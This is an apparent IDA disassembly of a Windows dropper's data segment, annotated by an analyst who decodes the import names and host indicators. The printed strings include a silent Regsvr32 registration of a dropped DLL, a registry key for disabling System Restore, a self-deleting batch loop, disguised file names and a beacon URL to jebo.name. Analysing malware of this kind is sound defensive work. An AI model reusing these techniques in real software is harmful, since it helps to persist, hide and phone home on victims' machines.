3AA69E85h, 4F56B0h, 119AA8A3h dd 0EAD3732Eh, 32C7348h, 0F76376BBh, 7F35702Ah, 9BE5D7D4h dd 3BD55EBDh, 863C1801h, 2DF0F527h, 0FBE4FC8Bh, 0C979B56h dd 86E71995h, 0B8C3EF6Fh, 460E95C7h, 8227837Fh, 8FBABBD1h dd 0EA9232Eh, 9AD68B8Bh, 0B6900FF1h, 0F86B08BBh, 5B6CC702h dd 68006FF8h, 8111E2C4h, 49526BA6h, 0BE1E7064h, 29C0BEE2h dd 1BEE6F9Ah, 17B98BDDh, 7AF28F4Ah, 0FA36497Eh, 2F37AF5Ah dd 0B61383B8h, 9E752DCAh, 215480BCh, 9F4568C1h, 4CED2582h dd 546A0D07h, 0D72BCB9h, 0E383264Eh, 0EE451BD1h, 8C47AB96h dd 195B7FEAh, 4B6F452Ah, 0A22F73DDh, 39D2A69Ch, 7C4811F0h dd 0E6CF927Ch, 92CD6323h, 410569E6h, 2494D6F7h, 3E6FF0A4h dd 2B6DC1F3h, 0F2F52FC7h, 0C4D9EDF1h, 0F10CA7A2h, 44DFD4CBh dd 0A298A737h, 15993C31h, 2BB9192Eh, 0BE592113h, 84D4D2E3h dd 0AFDF88E1h, 0F3D5EF08h, 1F7B36E5h, 12B432Ch, 3EBF5A45h dd 75A12CEEh, 7B59C198h, 0C66BBBDCh, 3A16612Ah, 1EA152AFh dd 0C00551B4h, 4BC324FEh, 36498D76h, 0E4F573C5h, 0B3E2975Ch dd 0A5C48A59h, 2F7AB0F2h, 524C2B97h, 47C67C54h, 0C81E7483h dd 7C67E4FDh, 0BCB99127h, 213E047Ch, 32E445D1h, 172D10B1h dd 0D5DCDFF7h, 4A4ABF02h, 0ED2DC914h, 0CE0E3CC8h, 3F606645h dd 2CE1B3EEh, 3AB9D695h, 0F5ADE983h, 0F5C04577h, 0CF10CA74h dd 0E48DB767h, 17E478EDh, 0A2D6D177h, 0C880746Bh, 9F53A640h dd 0DCD667CEh, 768E49FBh, 
5DCA7F05h, 7C7B6911h, 606D4F97h dd 5E81FF5Dh, 163371FDh, 684031ADh, 5D5FE945h, 9E93D6F6h dd 8A836542h, 2968A7E9h, 50DD2DFDh, 9E8F4C43h, 554B4B15h dd 60C315D7h, 0AC0AB816h, 81C4720Bh, 0BBF8BAD3h, 0CBD43DB7h dd 45A3C9C2h, 49B790FAh, 5A59CBB2h, 268D1BC7h, 8BCC56Fh dd 26C8C520h, 9C387B14h, 0C3DC5A31h, 81ABAF72h, 7291729Bh dd 0F2995D98h, 22F29CF6h, 7C9A6A3Ah, 9C5D4F3Bh, 20D47386h dd 2A4EE7EEh, 2C34B7A4h, 4C9BE9A4h, 7CF2BF48h, 56C5FBFFh dd 319A92F9h, 0B53E3168h, 7331A6BCh, 59AB3BB4h, 93A4C2ACh dd 904BAD2Bh, 0D75CEA59h, 8FABE997h, 368540C6h, 379718C8h dd 0C325DD94h, 0A17FE831h, 2B0D0C12h, 63FD700Bh, 0A87B4DF7h dd 0C5C8D30h, 38DB403Bh, 0E22B00DDh, 3948E690h, 72CB5B3Dh dd 0DB9060BCh, 3CD27F9Fh, 0BFE6B459h, 1281AC01h, 201AE373h dd 505DB11Fh, 6CCB7C43h, 5E831E6Bh, 4DC821BEh, 0A5EFA92Ch dd 3C382A0Fh, 22972EE6h, 8EEE143Bh, 0D4325391h, 0C39CB6B7h dd 486772Ch, 0C0F7DF0Ah, 0F9F28E90h, 34CB98B7h, 263E1FC4h dd 29980B71h, 0C5C06CB4h, 0D04C964Eh, 85C2BA5Fh, 465808D1h dd 73AF1D9Bh, 9EF8A4DDh, 6E7631C8h, 0FE519B4Eh, 0A3C4995Eh dd 1FA1DF32h, 717DEC65h, 45DC403Bh, 0DE6AF31Bh, 8AE3EE87h dd 0BC1547BDh, 40AF9BE3h, 0F7DD9AA5h, 643B9FAh, 0F85865CFh dd 0F23D6434h, 4C589C8Ch, 688B83F4h, 0EC12778Eh, 294AB391h dd 0AC55F5DAh, 11946E71h, 0A65B3222h, 0B9211F79h, 1BA85761h dd 73h dup(0) dd 3138h, 3064h, 3 dup(0) dd 329Ah, 30ACh, 3 dup(0) dd 3338h, 30CCh, 3 dup(0) dd 33D6h, 30F4h, 5 dup(0) dd 3146h, 3164h, 3178h, 3188h, 319Ah, 31B8h, 31C0h, 31D6h dd 31EAh, 31FAh, 320Ch, 3226h, 3240h, 324Eh, 325Ch, 3270h dd 3288h, 0 dd 32A6h, 32BAh, 32C8h, 32DEh, 32F4h, 330Ah, 3322h, 0 dd 3342h, 3358h, 3364h, 337Ah, 338Ah, 339Ah, 33ACh, 33B8h dd 33C2h, 0 dd 33E4h, 33F8h, 3410h, 342Eh, 343Eh, 3454h, 3464h, 347Ah dd 348Ch, 34A8h, 34C6h, 34DCh, 34EEh, 3500h, 3510h, 3520h dd 0 aKernel32_dll db 'KERNEL32.DLL',0 align 4 aScrollconsoles db 'ScrollConsoleScreenBufferA',0 align 10h dd 73490000h, 75626544h, 72656767h, 73657250h, 746E65h dd 68540000h, 64616572h, 654E3233h, 7478h, 69560000h, 61757472h dd 6F72506Ch, 74636574h, 0 
; ---------------------------------------------------------------------------
; Import name strings (continued), followed by the sample's own string
; constants.
;
; Each unlabeled `dd` run in the first part is little-endian ASCII that IDA
; did not convert to a string: two zero bytes followed by a NUL-terminated
; name, which is consistent with PE import-by-name entries carrying hint 0.
; The decoded names are given above each run. Two runs also hold DLL names.
; NOTE(review): being listed here does not show an API is actually called;
; confirm against the code before drawing conclusions from the import list.
; ---------------------------------------------------------------------------
aGetconsolescre db 'GetConsoleScreenBufferInfo',0
                align 4
                ; decodes to: "Sleep", "InterlockedExchange", "GetModuleHandleA"
                dd 6C530000h, 706565h, 6E490000h, 6C726574h, 656B636Fh
                dd 63784564h, 676E6168h, 65h, 4D746547h, 6C75646Fh, 6E614865h
                dd 41656C64h, 0
aGetconsolecp   db 'GetConsoleCP',0
                align 4
aGetprocaddress db 'GetProcAddress',0
                align 4
                ; decodes to: "SetEnvironmentVariableA", "OpenProfileUserMapping",
                ; "LocalAlloc"
                dd 65530000h, 766E4574h, 6E6F7269h, 746E656Dh, 69726156h
                dd 656C6261h, 41h, 6E65704Fh, 666F7250h, 55656C69h, 4D726573h
                dd 69707061h, 676Eh, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aExitprocess    db 'ExitProcess',0
                ; decodes to: "SetConsoleTitleW", "WriteProfileSectionW",
                ; "GetCommandLineA", then the DLL name "USER32.DLL"
                dd 65530000h, 6E6F4374h, 656C6F73h, 6C746954h, 5765h, 72570000h
                dd 50657469h, 69666F72h, 6553656Ch, 6F697463h, 576Eh, 65470000h
                dd 6D6F4374h, 646E616Dh, 656E694Ch, 53550041h, 32335245h
                dd 4C4C442Eh, 0
aGetsystemmetri db 'GetSystemMetrics',0
                align 4
aEditwndproc    db 'EditWndProc',0
                ; decodes to: "GetLastActivePopup"
                dd 65470000h, 73614C74h, 74634174h, 50657669h, 7075706Fh
                dd 0
aSetmenuitembit db 'SetMenuItemBitmaps',0
                align 10h
                ; decodes to: "SendMessageTimeoutW", "ArrangeIconicWindows"
                dd 65530000h, 654D646Eh, 67617373h, 6D695465h, 74756F65h
                dd 57h, 61727241h, 4965676Eh, 696E6F63h, 6E695763h, 73776F64h
                dd 0
aEnumwindowstat db 'EnumWindowStationsW',0
aGdi32_dll      db 'GDI32.DLL',0
                align 10h
aGettextextentp db 'GetTextExtentPointA',0
                ; decodes to: "SetBkMode", "gdiPlaySpoolStream"
                dd 65530000h, 4D6B4274h, 65646Fh, 64670000h, 616C5069h
                dd 6F705379h, 74536C6Fh, 6D616572h, 0
aSetbitmapbits  db 'SetBitmapBits',0
                align 4
aSettextalign_0 db 'SetTextAlign',0
                align 4
aGeticmprofilew db 'GetICMProfileW',0
                align 4
                ; decodes to: "CreateDCW", "FillRgn", "GetViewportExtEx", the DLL
                ; name "ADVAPI32.DLL", then "CryptSetProviderW",
                ; "CryptAcquireContextA", "SetSecurityDescriptorOwner"
                dd 72430000h, 65746165h, 574344h, 69460000h, 67526C6Ch
                dd 6Eh, 56746547h, 70776569h, 4574726Fh, 78457478h, 44410000h
                dd 49504156h, 442E3233h, 4C4Ch, 72430000h, 53747079h, 72507465h
                dd 6469766Fh, 577265h, 72430000h, 41747079h, 69757163h
                dd 6F436572h, 7865746Eh, 4174h, 65530000h, 63655374h, 74697275h
                dd 73654479h, 70697263h, 4F726F74h, 72656E77h, 0
aCryptdecrypt_0 db 'CryptDecrypt',0
                align 4
aGetsidsubautho db 'GetSidSubAuthority',0
                align 10h
                ; decodes to: "IsTextUnicode", "QueryServiceStatus"
                dd 73490000h, 74786554h, 63696E55h, 65646Fh, 75510000h
                dd 53797265h, 69767265h, 74536563h, 73757461h, 0
aGettrusteename db 'GetTrusteeNameW',0
                ; decodes to: "AllocateAndInitializeSid",
                ; "LookupPrivilegeDisplayNameW", "GetServiceKeyNameA",
                ; "CryptDeriveKey"
                dd 6C410000h, 61636F6Ch, 6E416574h, 696E4964h, 6C616974h
                dd 53657A69h, 6469h, 6F4C0000h, 70756B6Fh, 76697250h, 67656C69h
                dd 73694465h, 79616C70h, 656D614Eh, 57h, 53746547h, 69767265h
                dd 654B6563h, 6D614E79h, 4165h, 72430000h, 44747079h, 76697265h
                dd 79654B65h, 0
aCryptcreatehas db 'CryptCreateHash',0
                db 0
                align 2
aCrypthashdat_0 db 'CryptHashData',0
                db 0
                align 2
aRegenumkeyexa  db 'RegEnumKeyExA',0
                db 0
                align 2
aLockservicedat db 'LockServiceDatabase',0
                align 4
                ; 558h zero dwords of padding before the sample's own strings.
                dd 558h dup(0)

; ---------------------------------------------------------------------------
; String constants of the sample. The IDA cross-references name the routine
; that uses each one. Several are host or network indicators.
; ---------------------------------------------------------------------------

; wsprintfA format used in start to build the command line that is then
; handed to WinExec: a silent (/s) Regsvr32 registration of the dropped DLL.
aRegsvr32_exeSS db 'Regsvr32.exe /s %s',0 ; DATA XREF: start+6Fo
; File name that start appends (lstrcatA) to the GetSystemDirectoryA result
; before creating and writing the file.
aHsjefi8wunkmdf db '\hsjefi8wunkmdf.dll',0 ; DATA XREF: start+16o
; Registry key and value name referenced by sub_40150E, which start calls;
; that routine's body is not shown here. The key is the System Restore
; policy location, so presumably the routine writes the value to switch
; System Restore off - confirm in sub_40150E.
; NOTE(review): the value name is reproduced as printed on this page; the
; policy value is normally spelled without a space - verify against the binary.
aSoftwarePolici db 'SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore',0 ; DATA XREF: sub_40150E+17o
aDisableConfig  db 'Disable Config',0 ; DATA XREF: sub_40150E+3Bo
aExplorer_exe   db 'explorer.exe',0 ; DATA XREF: start+112o
; URL template: %s receives an identifier and ver=vp0 is fixed text. Host and
; path are the network indicator; the expanded form appears later in this
; segment as aHttpJebo_nam_0.
aHttpJebo_nameC db 'http://jebo.name/cd/un2.php?id=%s&ver=vp0',0 ; DATA XREF: start+106o
aP2hhr_bat      db 'p2hhr.bat',0 ; DATA XREF: sub_401127+43o
; Batch script text referenced by sub_401127: loop deleting the file given as
; %1 until it no longer exists, then delete the script itself (%0).
; Presumably written out as p2hhr.bat so the running image can remove itself;
; a short-lived .bat with this body is a host artefact worth detecting on.
aLsh2Del1IfExis db ':lsh2',0Dh,0Ah ; DATA XREF: sub_401127+73o
                                        ; sub_401127+86o
                db 'del %1',0Dh,0Ah
                db 'if exist %1 goto lsh2',0Dh,0Ah
                db 'del %0',0
; presumably the ShellExecute verb used to launch the batch file - confirm
aOpen           db 'open',0 ; DATA XREF: sub_401127+D0o
                db '\',0
; sub_401565 references 'WINID', 'ERROR', the Explorer key and '%lX%lX'.
; Presumably it builds an identifier with '%lX%lX' and keeps it under a
; WINID value in that key - confirm in sub_401565.
aWinid          db 'WINID',0 ; DATA XREF: sub_401565+44o
                                        ; sub_401565+8Do
aError          db 'ERROR',0 ; DATA XREF: sub_401565+B7o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0 ; DATA XREF: sub_401565+1Do
aLxLx           db '%lX%lX',0 ; DATA XREF: sub_401565+67o
; File-name pattern used by sub_4012DD: an unsigned number plus ".exe".
aLu_exe         db '%lu.exe',0 ; DATA XREF: sub_4012DD+1Fo
                                        ; sub_4012DD+69o
; File name that start appends to the GetTempPathA result before writing and
; running the second dropped file.
aWinlogun_exe   db 'winlogun.exe',0 ; DATA XREF: start+A6o
byte_40A66F     db 0 ; DATA XREF: sub_4012DD+16Co
                                        ; sub_4012DD+17Cr ...
                dd 3070400h, 801h
; Receives the CreateFileA return value in start and is passed to WriteFile
; and CloseHandle; 264h is the value captured in this image.
dword_40A678    dd 264h
; Referenced by sub_4012DD. Presumably an instance of the '%lu.exe' pattern
; left in the buffer when the image was captured - confirm.
a1646169094_exe db '1646169094.exe',0 ; DATA XREF: sub_4012DD+24o
                                        ; sub_4012DD+42o ...
                align 4
                dd 3Bh dup(0)
                db 3 dup(0)
; Path scratch buffer: start fills it through GetSystemDirectoryA and later
; GetTempPathA, each followed by lstrcatA. The text shown is what the buffer
; held in this image. Presumably the user-specific prefix belongs to the
; analysis machine and only the file name is a portable indicator.
aCDocume1Cybert db 'C:\DOCUME~1\cyberta\LOCALS~1\Temp\winlogun.exe',0 ; DATA XREF: start+Co
                                        ; start+1Bo ...
                align 4
                dd 1FEh dup(0)
                db 0
aA              db '',0 ; DATA XREF: sub_40150E+5o
                                        ; sub_40150E+40r ...
; ---------------------------------------------------------------------------
; Tail of the _rdata segment: run-time buffers as captured in this image,
; followed by the empty _idata2 segment and the entry-point directive.
; ---------------------------------------------------------------------------
                align 4
                db 0
; Passed to WriteFile in start as the bytes-written output. It holds 3A98h
; (15000), the same length start asks WriteFile to write for each dropped file.
dword_40AFA9    dd 3A98h
                align 10h
                dd 3 dup(0)
                db 0
; Path buffers referenced by sub_401127, which also references 'p2hhr.bat' and
; the self-delete batch text. Presumably the running image's own path and the
; batch file placed beside it. The C:\m_unpacker prefix looks like the
; unpacking environment rather than a field indicator - confirm.
aCM_unpackerP_0 db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_401127+1Co
                                        ; sub_401127:loc_4011D1o
                align 4
                dd 79h dup(0)
                db 0
aCM_unpackerP2h db 'C:\m_unpacker\p2hhr.bat',0 ; DATA XREF: sub_401127+Bo
                                        ; sub_401127+17o ...
                align 4
                dd 79h dup(0)
                db 0
; Buffer that start passes to wsprintfA as the destination for the
; 'Regsvr32.exe /s %s' command line and then to WinExec. The quoted path shown
; is what it held in this image.
aCM_unpackerPac db '"C:\m_unpacker\packed.exe"',0 ; DATA XREF: start+74o
                                        ; start+83o ...
; No cross-reference is listed for this string; the DLL name matches the
; file that start writes into the system directory.
aSystem32Hsjefi db 'system32\hsjefi8wunkmdf.dll',0
                dd 72h dup(0)
                db 0
; 15 hex characters referenced by sub_4012DD and sub_401565; the same text is
; the id= parameter of the URL below. Presumably an identifier generated at
; run time, so treat the value as specific to this run, not as a fixed
; indicator.
a1c97ae360a5d87 db '1C97AE360A5D87A',0 ; DATA XREF: sub_4012DD+A2o
                                        ; sub_401565+3Bo ...
                align 10h
                dd 3Bh dup(0)
                db 0
; The 'id=%s&ver=vp0' URL template expanded with the identifier above, as
; used by sub_4012DD. Host and path are the stable network indicator.
aHttpJebo_nam_0 db 'http://jebo.name/cd/un2.php?id=1C97AE360A5D87A&ver=vp0',0 ; DATA XREF: sub_4012DD+AAo
                                        ; sub_4012DD+C2o
                dd 3F2h dup(0)
                db 3 dup(0)
byte_40C6BF     db 0 ; DATA XREF: sub_40120B+11o
                                        ; sub_40120B+74o
                align 1000h
_rdata          ends

; Section 3. (virtual address 0000D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
; The segment below declares no data of its own, only an alignment directive.
_idata2         segment para public 'DATA' use32
                assume cs:_idata2
                ;org 40D000h
                align 2000h
_idata2         ends

; Program entry point is the `start` procedure.
                end start